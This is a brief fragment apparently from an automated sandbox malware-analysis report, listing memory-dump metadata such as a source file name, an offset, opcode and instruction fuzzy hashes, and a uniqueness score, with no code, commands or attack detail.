                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                          • Instruction ID: 96279688599f55324209394d83c8de183ba2747c31ca13cd73282722d817bc41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601B172B24B908BDF248F36B600349B6A2F38D7C4F148535EB9C83B18DA3CD5958B04
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%